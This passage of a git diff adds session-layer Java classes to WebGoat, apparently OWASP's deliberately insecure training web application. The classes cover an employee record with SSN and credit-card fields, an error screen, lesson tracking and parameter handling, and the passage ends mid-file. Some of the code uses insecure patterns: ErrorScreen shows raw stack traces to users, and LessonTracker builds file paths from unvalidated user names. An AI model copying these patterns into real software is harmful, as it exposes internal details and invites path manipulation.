+    private String disciplinaryActionDate;
+
+    private String disciplinaryActionNotes;
+
+    private String personalDescription;
+
+
+    // FIXME: To be deleted
+    public Employee()
+    {}
+
+
+    public Employee(int id, String firstName, String lastName, String ssn,
+	    String title, String phone, String address1, String address2,
+	    int manager, String startDate, int salary, String ccn,
+	    int ccnLimit, String disciplinaryActionDate,
+	    String disciplinaryActionNotes, String personalDescription)
+    {
+	this.id = id;
+	this.firstName = firstName;
+	this.lastName = lastName;
+	this.ssn = ssn;
+	this.title = title;
+	this.phone = phone;
+	this.address1 = address1;
+	this.address2 = address2;
+	this.manager = manager;
+	this.startDate = startDate;
+	this.salary = salary;
+	this.ccn = ccn;
+	this.ccnLimit = ccnLimit;
+	this.disciplinaryActionDate = disciplinaryActionDate;
+	this.disciplinaryActionNotes = disciplinaryActionNotes;
+	this.personalDescription = personalDescription;
+    }
+
+
+    public String getAddress1()
+    {
+	return address1;
+    }
+
+
+    public void setAddress1(String address1)
+    {
+	this.address1 = address1;
+    }
+
+
+    public String getAddress2()
+    {
+	return address2;
+    }
+
+
+    public void setAddress2(String address2)
+    {
+	this.address2 = address2;
+    }
+
+
+    public String getCcn()
+    {
+	return ccn;
+    }
+
+
+    public void setCcn(String ccn)
+    {
+	this.ccn = ccn;
+    }
+
+
+    public int getCcnLimit()
+    {
+	return ccnLimit;
+    }
+
+
+    public void setCcnLimit(int ccnLimit)
+    {
+	this.ccnLimit = ccnLimit;
+    }
+
+
+    public String getFirstName()
+    {
+	return firstName;
+    }
+
+
+    public void setFirstName(String firstName)
+    {
+	this.firstName = firstName;
+    }
+
+
+    public String getLastName()
+    {
+	return lastName;
+    }
+
+
+    public void setLastName(String lastName)
+    {
+	this.lastName = lastName;
+    }
+
+
+    public String getPhoneNumber()
+    {
+	return phone;
+    }
+
+
+    public void setPhoneNumber(String phone)
+    {
+	this.phone = phone;
+    }
+
+
+    public int getSalary()
+    {
+	return salary;
+    }
+
+
+    public void setSalary(int salary)
+    {
+	this.salary = salary;
+    }
+
+
+    public String getSsn()
+    {
+	return ssn;
+    }
+
+
+    public void setSsn(String ssn)
+    {
+	this.ssn = ssn;
+    }
+
+
+    public String getStartDate()
+    {
+	return startDate;
+    }
+
+
+    public void setStartDate(String startDate)
+    {
+	this.startDate = startDate;
+    }
+
+
+    public int getId()
+    {
+	return id;
+    }
+
+
+    public void setId(int id)
+    {
+	this.id = id;
+    }
+
+
+    public String getTitle()
+    {
+	return this.title;
+    }
+
+
+    public int getManager()
+    {
+	return this.manager;
+    }
+
+
+    public String getDisciplinaryActionDate()
+    {
+	return this.disciplinaryActionDate;
+    }
+
+
+    public String getDisciplinaryActionNotes()
+    {
+	return this.disciplinaryActionNotes;
+    }
+
+
+    public String getPersonalDescription()
+    {
+	return this.personalDescription;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java b/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java
new file mode 100644
index 000000000..459f109b6
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java
@@ -0,0 +1,88 @@
+package org.owasp.webgoat.session;
+
+import java.io.Serializable;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class EmployeeStub implements Serializable
+{
+
+    /**
+	 * 
+	 */
+	private static final long serialVersionUID = -7109162877797765632L;
+
+	private int id;
+
+    private String firstName;
+
+    private String lastName;
+
+    private String role;
+
+
+    public EmployeeStub(int id, String firstName, String lastName)
+    {
+	this(id, firstName, lastName, Employee.EMPLOYEE_ROLE);
+    }
+
+
+    public EmployeeStub(int id, String firstName, String lastName, String role)
+    {
+	this.id = id;
+	this.firstName = firstName;
+	this.lastName = lastName;
+	this.role = role;
+    }
+
+
+    public String getFirstName()
+    {
+	return firstName;
+    }
+
+
+    public int getId()
+    {
+	return id;
+    }
+
+
+    public String getLastName()
+    {
+	return lastName;
+    }
+
+
+    public String getRole()
+    {
+	return role;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java b/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java
new file mode 100644
index 000000000..5aa734794
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java
@@ -0,0 +1,278 @@
+package org.owasp.webgoat.session;
+
+import java.io.ByteArrayOutputStream;
+import java.io.PrintWriter;
+import java.util.StringTokenizer;
+import javax.servlet.ServletException;
+
+import org.owasp.webgoat.lessons.AbstractLesson;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.HtmlColor;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.Div;
+import org.apache.ecs.html.Form;
+import org.apache.ecs.html.H2;
+import org.apache.ecs.html.Small;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created    November 4, 2003
+ */
+public class ErrorScreen extends Screen
+{
+	/**
+	 *  Description of the Field
+	 */
+	protected Throwable error;
+
+	/**
+	 *  Description of the Field
+	 */
+	protected String message;
+
+
+
+	/**
+	 *  Constructor for the ErrorScreen object
+	 *
+	 * @param  s  Description of the Parameter
+	 * @param  t  Description of the Parameter
+	 */
+	public ErrorScreen( WebSession s, Throwable t )
+	{
+		this.error = t;
+		fixCurrentScreen( s );
+		setup( s );
+	}
+
+
+	/**
+	 *  Constructor for the ErrorScreen object
+	 *
+	 * @param  s    Description of the Parameter
+	 * @param  msg  Description of the Parameter
+	 */
+	public ErrorScreen( WebSession s, String msg )
+	{
+		this.message = msg;
+		fixCurrentScreen( s );
+		setup( s );
+	}
+
+
+	public void fixCurrentScreen( WebSession s )
+	{
+		// So the user can't get stuck on the error screen, reset the
+		// current screen to something known
+		if ( s!= null )
+		{ 
+			try 
+			{
+				s.setCurrentScreen( s.getCourse().getFirstLesson().getScreenId() );
+			}
+			catch ( Throwable t )
+			{
+				s.setCurrentScreen( WebSession.WELCOME );
+			}
+		}
+	}
+
+	
+	public void setup( WebSession s )
+	{
+		// call createContent first so messages will go somewhere
+
+		Form form = new Form( "attack", Form.POST ).setName( "form" ).setEncType( "" );
+
+		form.addElement( wrapForm( s ) );
+
+		TD lowerright = new TD().setHeight( "100%" ).setVAlign( "top" ).setAlign( "left" ).addElement( form );
+		TR row = new TR().addElement( lowerright );
+		Table layout = new Table().setBgColor( HtmlColor.WHITE ).setCellSpacing( 0 ).setCellPadding( 0 ).setBorder( 0 );
+
+        layout.addElement( row );
+   
+         setContent(layout);
+	}
+
+	protected Element wrapForm( WebSession s )
+	{
+		if ( s == null )
+		{
+			return new StringElement( "Invalid Session" );
+		}
+
+		Table container = new Table().setWidth( "100%" ).setCellSpacing( 10 ).setCellPadding( 0 ).setBorder( 0 );
+		
+		// CreateContent can generate error messages so you MUST call it before makeMessages()
+		Element content = createContent( s );
+		container.addElement( new TR().addElement( new TD().setColSpan( 2 ).setVAlign( "TOP" ).addElement(
+				makeMessages( s ) ) ) );
+		container.addElement( new TR().addElement( new TD().setColSpan( 2 ).addElement( content ) ) );
+		container.addElement( new TR() );
+
+		return ( container );
+	}
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  s  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+	protected Element createContent( WebSession s )
+	{
+		System.out.println( "errorscreen createContent Error:" + this.error + " message:" + this.message );
+
+		Element content;
+
+		if ( this.error != null )
+		{
+			content = createContent( this.error );
+		}
+		else if ( this.message != null )
+		{
+			content = createContent( this.message );
+		}
+		else
+		{
+			content = new StringElement( "An unknown error occurred." );
+		}
+
+		return content;
+	}
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  s  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+	protected Element createContent( String s )
+	{
+		StringElement list = new StringElement( s );
+
+		return ( list );
+	}
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  t  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+	protected Element createContent( Throwable t )
+	{
+		StringElement list = new StringElement();
+		list.addElement( new H2().addElement( new StringElement( "Error Message: " + t.getMessage() ) ) );
+		list.addElement( formatStackTrace( t ) );
+
+		if ( t instanceof ServletException )
+		{
+			Throwable root = ( (ServletException) t ).getRootCause();
+
+			if ( root != null )
+			{
+				list.addElement( new H2().addElement( new StringElement( "Root Message: " + root.getMessage() ) ) );
+				list.addElement( formatStackTrace( root ) );
+			}
+		}
+
+		return ( new Small().addElement( list ) );
+	}
+
+	public Element getCredits()
+	{
+		return new ElementContainer();
+	}
+
+
+	/**
+	 *  Description of the Method
+	 *
+	 * @param  t  Description of the Parameter
+	 * @return    Description of the Return Value
+	 */
+	public static Element formatStackTrace( Throwable t )
+	{
+		String trace = getStackTrace( t );
+		StringElement list = new StringElement();
+		StringTokenizer st = new StringTokenizer( trace, "\r\n\t" );
+
+		while ( st.hasMoreTokens() )
+		{
+			String line = st.nextToken();
+			list.addElement( new Div( line ) );
+		}
+
+		return ( list );
+	}
+
+
+	/**
+	 *  Gets the stackTrace attribute of the ErrorScreen class
+	 *
+	 * @param  t  Description of the Parameter
+	 * @return    The stackTrace value
+	 */
+	public static String getStackTrace( Throwable t )
+	{
+		ByteArrayOutputStream bytes = new ByteArrayOutputStream();
+		PrintWriter writer = new PrintWriter( bytes, true );
+		t.printStackTrace( writer );
+
+		return ( bytes.toString() );
+	}
+
+
+	/**
+	 *  Gets the title attribute of the ErrorScreen object
+	 *
+	 * @return    The title value
+	 */
+	public String getTitle()
+	{
+		return ( "Error" );
+	}
+	
+	public String getRole() {
+		return AbstractLesson.USER_ROLE;
+	}
+}
+
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java b/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java
new file mode 100644
index 000000000..edc1b16f6
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/LessonSession.java
@@ -0,0 +1,69 @@
+package org.owasp.webgoat.session;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * Represents a virtual session for a lesson.  Lesson-specific session data may
+ * be stored here.
+ * 
+ * @author David Anderson <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created January 19, 2006
+ */
+public class LessonSession
+{
+
+    private boolean isAuthenticated = false;
+
+    private String currentLessonScreen;
+
+
+    public void setAuthenticated(boolean isAuthenticated)
+    {
+	this.isAuthenticated = isAuthenticated;
+    }
+
+
+    public boolean isAuthenticated()
+    {
+	return this.isAuthenticated;
+    }
+
+
+    public void setCurrentLessonScreen(String currentLessonScreen)
+    {
+	this.currentLessonScreen = currentLessonScreen;
+    }
+
+
+    public String getCurrentLessonScreen()
+    {
+	return this.currentLessonScreen;
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java b/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java
new file mode 100644
index 000000000..bfb8bcfbf
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/LessonTracker.java
@@ -0,0 +1,445 @@
+package org.owasp.webgoat.session;
+
+import java.io.FileInputStream;
+import java.io.FileNotFoundException;
+import java.io.FileOutputStream;
+import java.util.Properties;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 29, 2003
+ */
+public class LessonTracker
+{
+
+    private boolean completed = false;
+
+    private int maxHintLevel = 0;
+
+    private int numVisits = 0;
+
+    private boolean viewedCookies = false;
+
+    private boolean viewedHtml = false;
+
+    private boolean viewedLessonPlan = false;
+
+    private boolean viewedParameters = false;
+
+    private boolean viewedSource = false;
+
+    private boolean viewedSolution = false;
+
+    Properties lessonProperties = new Properties();
+
+
+    /**
+     *  Gets the completed attribute of the LessonTracker object
+     *
+     * @return    The completed value
+     */
+    public boolean getCompleted()
+    {
+	return completed;
+    }
+
+
+    /**
+     *  Gets the maxHintLevel attribute of the LessonTracker object
+     *
+     * @return    The maxHintLevel value
+     */
+    public int getMaxHintLevel()
+    {
+	return maxHintLevel;
+    }
+
+
+    /**
+     *  Gets the numVisits attribute of the LessonTracker object
+     *
+     * @return    The numVisits value
+     */
+    public int getNumVisits()
+    {
+	return numVisits;
+    }
+
+
+    /**
+     *  Gets the viewedCookies attribute of the LessonTracker object
+     *
+     * @return    The viewedCookies value
+     */
+    public boolean getViewedCookies()
+    {
+	return viewedCookies;
+    }
+
+
+    /**
+     *  Gets the viewedHtml attribute of the LessonTracker object
+     *
+     * @return    The viewedHtml value
+     */
+    public boolean getViewedHtml()
+    {
+	return viewedHtml;
+    }
+
+
+    /**
+     *  Gets the viewedLessonPlan attribute of the LessonTracker object
+     *
+     * @return    The viewedLessonPlan value
+     */
+    public boolean getViewedLessonPlan()
+    {
+	return viewedLessonPlan;
+    }
+
+
+    /**
+     *  Gets the viewedParameters attribute of the LessonTracker object
+     *
+     * @return    The viewedParameters value
+     */
+    public boolean getViewedParameters()
+    {
+	return viewedParameters;
+    }
+
+
+    /**
+     *  Gets the viewedSource attribute of the LessonTracker object
+     *
+     * @return    The viewedSource value
+     */
+    public boolean getViewedSource()
+    {
+	return viewedSource;
+    }
+
+
+    public boolean getViewedSolution()
+    {
+	return viewedSource;
+    }
+
+    /**
+     *  Description of the Method
+     */
+    public void incrementNumVisits()
+    {
+	numVisits++;
+    }
+
+
+    /**
+     *  Sets the properties attribute of the LessonTracker object
+     *
+     * @param  props  The new properties value
+     */
+    protected void setProperties(Properties props, Screen screen)
+    {
+	completed = Boolean.valueOf(
+		props.getProperty(screen.getTitle() + ".completed"))
+		.booleanValue();
+	maxHintLevel = Integer.parseInt(props.getProperty(screen.getTitle()
+		+ ".maxHintLevel"));
+	numVisits = Integer.parseInt(props.getProperty(screen.getTitle()
+		+ ".numVisits"));
+	viewedCookies = Boolean.valueOf(
+		props.getProperty(screen.getTitle() + ".viewedCookies"))
+		.booleanValue();
+	viewedHtml = Boolean.valueOf(
+		props.getProperty(screen.getTitle() + ".viewedHtml"))
+		.booleanValue();
+	viewedLessonPlan = Boolean.valueOf(
+		props.getProperty(screen.getTitle() + ".viewedLessonPlan"))
+		.booleanValue();
+	viewedParameters = Boolean.valueOf(
+		props.getProperty(screen.getTitle() + ".viewedParameters"))
+		.booleanValue();
+	viewedSource = Boolean.valueOf(
+		props.getProperty(screen.getTitle() + ".viewedSource"))
+		.booleanValue();
+    }
+
+
+    public static String getUserDir(WebSession s)
+    {
+	return s.getContext().getRealPath("users") + "/";
+    }
+
+
+    private static String getTrackerFile(WebSession s, String user,
+	    Screen screen)
+    {
+	return getUserDir(s) + user + "." + screen.getClass().getName()
+		+ ".props";
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  screen  Description of the Parameter
+     * @param  s       Description of the Parameter
+     * @return         Description of the Return Value
+     */
+    public static LessonTracker load(WebSession s, String user, Screen screen)
+    {
+	FileInputStream in = null;
+	try
+	{
+	    String fileName = getTrackerFile(s, user, screen);
+	    if (fileName != null)
+	    {
+		Properties tempProps = new Properties();
+		//System.out.println("Loading lesson state from: " + fileName);
+		in = new FileInputStream(fileName);
+		tempProps.load(in);
+		// allow the screen to use any custom properties it may have set
+		LessonTracker tempLessonTracker = screen
+			.createLessonTracker(tempProps);
+		tempLessonTracker.setProperties(tempProps, screen);
+		return tempLessonTracker;
+	    }
+	}
+	catch (FileNotFoundException e)
+	{
+	    // Normal if the lesson has not been accessed yet.
+	}
+	catch (Exception e)
+	{
+	    System.out.println("Failed to load lesson state for " + screen);
+	    e.printStackTrace();
+	}
+	finally
+	{
+	    try
+	    {
+		in.close();
+	    }
+	    catch (Exception e)
+	    {}
+	}
+
+	return screen.createLessonTracker();
+    }
+
+
+    /**
+     *  Sets the completed attribute of the LessonTracker object
+     *
+     * @param  completed  The new completed value
+     */
+    public void setCompleted(boolean completed)
+    {
+	this.completed = completed;
+    }
+
+
+    /**
+     *  Sets the maxHintLevel attribute of the LessonTracker object
+     *
+     * @param  maxHintLevel  The new maxHintLevel value
+     */
+    public void setMaxHintLevel(int maxHintLevel)
+    {
+	this.maxHintLevel = Math.max(this.maxHintLevel, maxHintLevel);
+    }
+
+
+    /**
+     *  Sets the viewedCookies attribute of the LessonTracker object
+     *
+     * @param  viewedCookies  The new viewedCookies value
+     */
+    public void setViewedCookies(boolean viewedCookies)
+    {
+	this.viewedCookies = viewedCookies;
+    }
+
+
+    /**
+     *  Sets the viewedHtml attribute of the LessonTracker object
+     *
+     * @param  viewedHtml  The new viewedHtml value
+     */
+    public void setViewedHtml(boolean viewedHtml)
+    {
+	this.viewedHtml = viewedHtml;
+    }
+
+
+    /**
+     *  Sets the viewedLessonPlan attribute of the LessonTracker object
+     *
+     * @param  viewedLessonPlan  The new viewedLessonPlan value
+     */
+    public void setViewedLessonPlan(boolean viewedLessonPlan)
+    {
+	this.viewedLessonPlan = viewedLessonPlan;
+    }
+
+
+    /**
+     *  Sets the viewedParameters attribute of the LessonTracker object
+     *
+     * @param  viewedParameters  The new viewedParameters value
+     */
+    public void setViewedParameters(boolean viewedParameters)
+    {
+	this.viewedParameters = viewedParameters;
+    }
+
+
+    /**
+     *  Sets the viewedSource attribute of the LessonTracker object
+     *
+     * @param  viewedSource  The new viewedSource value
+     */
+    public void setViewedSource(boolean viewedSource)
+    {
+	this.viewedSource = viewedSource;
+    }
+
+    /**
+     *  Sets the viewedSource attribute of the LessonTracker object
+     *
+     * @param  viewedSource  The new viewedSource value
+     */
+    public void setViewedSolution(boolean viewedSolution)
+    {
+	this.viewedSolution = viewedSolution;
+    }
+
+    /**
+     *  Allows the storing of properties for the logged in and a screen.
+     *
+     * @param  s  Description of the Parameter
+     */
+    public void store(WebSession s, Screen screen)
+    {
+	store(s, screen, s.getUserName());
+    }
+
+
+    /**
+     *  Allows the storing of properties for a user and a screen.
+     *
+     * @param  s  Description of the Parameter
+     */
+    public void store(WebSession s, Screen screen, String user)
+    {
+	FileOutputStream out = null;
+	String fileName = getTrackerFile(s, user, screen);
+	//System.out.println( "Storing data to" + fileName );
+	lessonProperties.setProperty(screen.getTitle() + ".completed", Boolean
+		.toString(completed));
+	lessonProperties.setProperty(screen.getTitle() + ".maxHintLevel",
+		Integer.toString(maxHintLevel));
+	lessonProperties.setProperty(screen.getTitle() + ".numVisits", Integer
+		.toString(numVisits));
+	lessonProperties.setProperty(screen.getTitle() + ".viewedCookies",
+		Boolean.toString(viewedCookies));
+	lessonProperties.setProperty(screen.getTitle() + ".viewedHtml", Boolean
+		.toString(viewedHtml));
+	lessonProperties.setProperty(screen.getTitle() + ".viewedLessonPlan",
+		Boolean.toString(viewedLessonPlan));
+	lessonProperties.setProperty(screen.getTitle() + ".viewedParameters",
+		Boolean.toString(viewedParameters));
+	lessonProperties.setProperty(screen.getTitle() + ".viewedSource",
+		Boolean.toString(viewedSource));
+	try
+	{
+	    out = new FileOutputStream(fileName);
+	    lessonProperties.store(out, s.getUserName());
+	}
+	catch (Exception e)
+	{
+	    // what do we want to do,  I think nothing.
+	    System.out.println("Warning User data for " + s.getUserName()
+		    + " will not persist");
+	}
+	finally
+	{
+	    try
+	    {
+		out.close();
+	    }
+	    catch (Exception e)
+	    {}
+	}
+
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     * @return    Description of the Return Value
+     */
+    public String toString()
+    {
+	StringBuffer buff = new StringBuffer();
+	buff.append("LessonTracker:" + "\n");
+	buff.append("    - completed:.......... " + completed + "\n");
+	buff.append("    - maxHintLevel:....... " + maxHintLevel + "\n");
+	buff.append("    - numVisits:.......... " + numVisits + "\n");
+	buff.append("    - viewedCookies:...... " + viewedCookies + "\n");
+	buff.append("    - viewedHtml:......... " + viewedHtml + "\n");
+	buff.append("    - viewedLessonPlan:... " + viewedLessonPlan + "\n");
+	buff.append("    - viewedParameters:... " + viewedParameters + "\n");
+	buff.append("    - viewedSource:....... " + viewedSource + "\n" + "\n");
+	return buff.toString();
+    }
+
+
+    /**
+     * @return Returns the lessonProperties.
+     */
+    public Properties getLessonProperties()
+    {
+	return lessonProperties;
+    }
+
+
+    /**
+     * @param lessonProperties The lessonProperties to set.
+     */
+    public void setLessonProperties(Properties lessonProperties)
+    {
+	this.lessonProperties = lessonProperties;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java b/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java
new file mode 100644
index 000000000..7971ecf7b
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/Parameter.java
@@ -0,0 +1,90 @@
+package org.owasp.webgoat.session;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class Parameter implements Comparable
+{
+
+    String name;
+
+    String value;
+
+
+    public Parameter(String name, String value)
+    {
+	this.name = name;
+	this.value = value;
+    }
+
+
+    public String getName()
+    {
+	return name;
+    }
+
+
+    public String getValue()
+    {
+	return value;
+    }
+
+
+    //@Override
+    public boolean equals(Object obj)
+    {
+	if (obj instanceof Parameter)
+	{
+	    Parameter other = (Parameter) obj;
+	    return (name.equals(other.getName()) && value.equals(other
+		    .getValue()));
+	}
+	return false;
+    }
+
+
+    //@Override
+    public int hashCode()
+    {
+	return toString().hashCode();
+    }
+
+
+    //@Override
+    public String toString()
+    {
+	return (name + "=" + value);
+    }
+
+
+    public int compareTo(Object o)
+    {
+	return toString().compareTo(o.toString());
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java b/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java
new file mode 100644
index 000000000..ee14a37b1
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ParameterNotFoundException.java
@@ -0,0 +1,62 @@
+package org.owasp.webgoat.session;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ */
+public class ParameterNotFoundException extends Exception
+{
+
+    /**
+	 * 
+	 */
+	private static final long serialVersionUID = 3286112913299408382L;
+
+
+	/**
+     *  Constructs a new ParameterNotFoundException with no detail message.
+     */
+    public ParameterNotFoundException()
+    {
+	super();
+    }
+
+
+    /**
+     *  Constructs a new ParameterNotFoundException with the specified detail
+     *  message.
+     *
+     *@param  s  the detail message
+     */
+    public ParameterNotFoundException(String s)
+    {
+	super(s);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java b/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java
new file mode 100644
index 000000000..abb3f6bf6
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java
@@ -0,0 +1,1085 @@
+package org.owasp.webgoat.session;
+
+import java.util.Enumeration;
+import java.util.StringTokenizer;
+import java.util.Vector;
+import java.util.regex.Pattern;
+
+import javax.servlet.ServletRequest;
+
+import org.owasp.webgoat.util.HtmlEncoder;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ */
+public class ParameterParser
+{
+
+	private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't
+																		// allow
+																		// #&
+																		// specifically
+
+	private ServletRequest request;
+
+	/**
+	 * Constructs a new ParameterParser to handle the parameters of the given
+	 * request.
+	 * 
+	 * @param request
+	 *            the servlet request
+	 */
